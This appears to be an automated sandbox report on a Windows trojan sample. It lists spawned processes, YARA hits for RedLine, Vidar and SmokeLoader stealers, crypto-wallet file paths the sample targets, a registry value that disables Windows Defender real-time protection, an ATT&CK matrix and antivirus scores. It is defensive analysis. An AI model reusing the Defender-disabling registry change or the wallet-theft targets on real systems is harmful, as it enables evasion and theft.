Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.exe arnatic_6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\4kmOewH8kDodZZ2lCCJUwR4o.exe "C:\Users\user\Documents\4kmOewH8kDodZZ2lCCJUwR4o.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\WN7mKI9_SQ4ujDwH_kKQHbe7.exe "C:\Users\user\Documents\WN7mKI9_SQ4ujDwH_kKQHbe7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\l7AR_7u5i2RZzKoKItslndOd.exe "C:\Users\user\Documents\l7AR_7u5i2RZzKoKItslndOd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\R2IpdvMDW3mqJjP0F3OqthCG.exe "C:\Users\user\Documents\R2IpdvMDW3mqJjP0F3OqthCG.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\duCdI76Gqz3hAbP72ldEGd_3.exe "C:\Users\user\Documents\duCdI76Gqz3hAbP72ldEGd_3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\bCyMoheCXfvXOWdcxUFW1mSl.exe "C:\Users\user\Documents\bCyMoheCXfvXOWdcxUFW1mSl.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior

Source: arnatic_3.exe, 0000000F.00000000.325290628.0000000000FD0000.00000002.00020000.sdmp, arnatic_3.exe, 0000000F.00000000.320908704.0000000000FD0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: arnatic_3.exe, 0000000F.00000000.325290628.0000000000FD0000.00000002.00020000.sdmp, arnatic_3.exe, 0000000F.00000000.320908704.0000000000FD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: arnatic_3.exe, 0000000F.00000000.325290628.0000000000FD0000.00000002.00020000.sdmp, arnatic_3.exe, 0000000F.00000000.320908704.0000000000FD0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: arnatic_3.exe, 0000000F.00000000.325290628.0000000000FD0000.00000002.00020000.sdmp, arnatic_3.exe, 0000000F.00000000.320908704.0000000000FD0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	15_2_0047809C
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	15_2_0047815C
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	15_2_004781C3
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	15_2_004781FF
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	15_2_004765FB
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	15_2_004768A6
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	15_2_0047CAE9
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	15_2_0047CBC3
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: EnumSystemLocalesW,	19_2_00E7A89E
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: EnumSystemLocalesW,	19_2_00E7A803
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: EnumSystemLocalesW,	19_2_00E769EA
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	19_2_00E7ACA4
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	19_2_00E7A540
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	19_2_00E7AE78
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: EnumSystemLocalesW,	19_2_00E7A7B8
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: GetLocaleInfoW,	19_2_00E76F89

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe

Code function: 19_2_00E38A68 cpuid

19_2_00E38A68

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe

Code function: 7_2_0040C0E0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_0040C0E0

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe

Code function: 15_2_004710D2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

15_2_004710D2

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe

Code function: 15_2_0045F39E GetUserNameA,

15_2_0045F39E

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Code function: 1_2_00401951 GetVersionExW,

1_2_00401951

Lowering of HIPS / PFW / Operating System Security Settings:

Disable Windows Defender real time protection (registry)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 0000002F.00000003.469242812.0000000000844000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.310217852.0000000000C1F000.00000004.00000001.sdmp, type: MEMORY

Yara Genericmalware

Show sources

Source: Yara match	File source: C:\Users\user\Documents\RcGzT5XRuDFwXkIj8ZcXjhgH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe, type: DROPPED

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 0000002D.00000002.765127683.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.443693776.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.765437481.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.704126944.0000000002E01000.00000020.00020000.sdmp, type: MEMORY

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 15.0.arnatic_3.exe.23e0e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.arnatic_3.exe.23e0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.arnatic_3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.arnatic_3.exe.2480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.arnatic_3.exe.2480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.23e0e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.23e0e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.arnatic_3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.arnatic_3.exe.23e0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.23e0e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.424491159.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.316957711.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.322961935.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.321122893.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arnatic_3.exe PID: 6564, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: ElectrumLTC
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: ElectronCash
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: \Electrum\wallets\
Source: arnatic_3.exe	String found in binary or memory: JaxxLiberty
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: window-state.json
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: exodus.conf.json
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: info.seco
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: ElectrumLTC
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: passphrase.json
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: Exodus
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: default_wallet
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: file__0.localstorage
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: MultiDoge
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: seed.seco
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: keystore
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match	File source: C:\Users\user\Documents\RcGzT5XRuDFwXkIj8ZcXjhgH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe, type: DROPPED

Source: Yara match	File source: 00000018.00000003.310217852.0000000000C1F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arnatic_3.exe PID: 6564, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 0000002F.00000003.469242812.0000000000844000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.310217852.0000000000C1F000.00000004.00000001.sdmp, type: MEMORY

Yara Genericmalware

Show sources

Source: Yara match	File source: C:\Users\user\Documents\RcGzT5XRuDFwXkIj8ZcXjhgH.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe, type: DROPPED

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 0000002D.00000002.765127683.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.443693776.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.765437481.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.704126944.0000000002E01000.00000020.00020000.sdmp, type: MEMORY

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 15.0.arnatic_3.exe.23e0e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.arnatic_3.exe.23e0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.arnatic_3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.arnatic_3.exe.2480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.arnatic_3.exe.2480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.23e0e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.23e0e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.arnatic_3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.arnatic_3.exe.23e0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.arnatic_3.exe.23e0e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.424491159.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.316957711.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.322961935.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.321122893.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arnatic_3.exe PID: 6564, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading11	DLL Side-Loading11	Disable or Modify Tools11	Input Capture1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Bypass User Access Control1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System11	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection12	Obfuscated Files or Information41	Security Account Manager	File and Directory Discovery14	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing141	NTDS	System Information Discovery35	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading11	Cached Domain Credentials	Security Software Discovery221	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Bypass User Access Control1	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading11	Proc Filesystem	Process Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection12	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	64%	Virustotal		Browse
0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	11%	Metadefender		Browse
0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	70%	ReversingLabs	Win32.Trojan.Azorult
0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	100%	Avira	HEUR/AGEN.1206449

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr758214[1].exe	100%	Avira	HEUR/AGEN.1144918
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\HR[1].exe	100%	Avira	HEUR/AGEN.1142105
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.txt	100%	Avira	HEUR/AGEN.1144344
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr943210[1].exe	100%	Avira	HEUR/AGEN.1144918
